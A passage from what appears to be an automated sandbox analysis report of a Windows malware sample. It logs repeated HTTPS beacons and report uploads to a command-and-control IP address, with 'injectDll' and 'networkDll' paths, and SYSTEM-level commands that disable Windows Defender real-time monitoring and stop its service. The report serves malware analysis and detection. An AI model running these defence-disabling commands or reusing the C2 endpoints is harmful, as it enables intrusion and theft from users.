Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x680

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xb0

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xde0

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xde8

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xdec

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xe18

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xe1c

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xdf0

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xdd4

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xdd0

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xe30

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xdb4

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xf50

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xf60

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn

Thread 0xf44

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11097349	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/networkDll/Log/SendReport/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BBFD85 Content-Length: 108 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/networkDll/Log/SendReport/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn

Thread 0xf54

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn

Thread 0xf58

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11100282	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/networkDll/Log/SendReport/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BC08FA Content-Length: 129 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/networkDll/Log/SendReport/	1	Fn Data

Process #26: cmd.exe

Information	Value
ID	#26
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:24, Reason: Child Process
Unmonitor	End Time: 00:01:32, Reason: Self Terminated
Monitor Duration	00:00:07

OS Process Information

Information	Value
PID	0x22c
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x 130

Threads

Thread 0x130

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:31:33 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10932253	1	Fn
System	Get Time	type = Performance Ctr, time = 15866395746	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a580000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 200, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x3ac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000001	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #27: cmd.exe

Information	Value
ID	#27
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c sc stop WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:24, Reason: Child Process
Unmonitor	End Time: 00:01:26, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x7dc
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x 7D8

Threads

Thread 0x7d8

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:31:33 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10932347	1	Fn
System	Get Time	type = Performance Ctr, time = 15875622737	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a580000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
